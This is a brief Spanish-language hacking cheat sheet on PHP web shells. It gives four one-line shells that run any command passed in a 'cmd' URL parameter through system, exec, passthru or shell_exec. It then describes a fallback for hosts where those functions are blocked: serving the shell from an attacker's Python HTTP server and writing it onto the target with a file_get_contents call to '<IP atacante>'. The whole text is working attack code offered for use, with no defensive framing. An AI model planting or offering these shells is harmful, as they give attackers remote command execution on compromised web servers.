Webshell

Webshell

PHP

<?php echo system($_GET['cmd']); ?>
<?php echo exec($_GET['cmd']); ?>
<?php echo passthru($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>

Si todas las funciones anteriores están bloqueadas, se puede crear un fichero PHP desde un servidor remoto, y en este incluir nuestro código malicioso:

1. Crear un fichero "s.php" con alguno de los valores anteriores, por ejemplo:

<?php echo system($_GET['cmd']); ?>

1. Poner el puerto 80 a la escucha:

python3 -m http.server 80

1. Modificar el siguiente comando con los valores de la IP del servidor donde se aloja el fichero PHP y el nombre con el que queremos almacenar el fichero en el servidor:

<?php file_put_contents('s.php',file_get_contents('http://<IP atacante>:80/s.php')) ?>